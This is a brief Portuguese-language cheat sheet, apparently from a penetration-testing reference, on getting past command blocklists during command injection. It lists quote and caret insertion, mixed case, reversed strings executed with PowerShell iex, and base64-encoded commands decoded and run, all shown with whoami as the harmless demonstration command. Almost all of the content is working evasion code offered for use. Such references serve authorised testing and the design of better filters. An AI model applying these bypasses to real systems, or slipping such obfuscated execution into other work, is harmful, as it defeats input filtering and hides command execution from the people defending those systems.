# Blacklisted Command Bypass

| Código                                                                                                       | Descrição                                     |
| ------------------------------------------------------------------------------------------------------------ | --------------------------------------------- |
| **Inserção de Personagem**                                                                                   |                                               |
| `'`ou`"`                                                                                                     | O total deve ser par                          |
| `^`                                                                                                          | Somente Windows (CMD)                         |
| **Manipulação de Caso**                                                                                      |                                               |
| `WhoAmi`                                                                                                     | Basta enviar o personagem com casos estranhos |
| **Comandos invertidos**                                                                                      |                                               |
| `"whoami"[-1..-20] -join ''`                                                                                 | Inverter uma string                           |
| `iex "$('imaohw'[-1..-20] -join '')"`                                                                        | Executar comando invertido                    |
| **Comandos Codificados**                                                                                     |                                               |
| `[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('whoami'))`                              | Codifique uma string com base64               |
| `iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"` | Executar string codificada em b64             |
